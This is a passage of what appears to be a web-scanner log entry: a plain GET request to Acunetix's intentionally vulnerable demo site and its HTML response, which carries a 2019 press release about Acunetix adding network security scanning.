WFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWjL6iDQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAoC8+YwLqXVDFYA1YYr1Hu6oI9o" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
Method	GET
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 349 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 30545
Response Body - size: 30,545 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3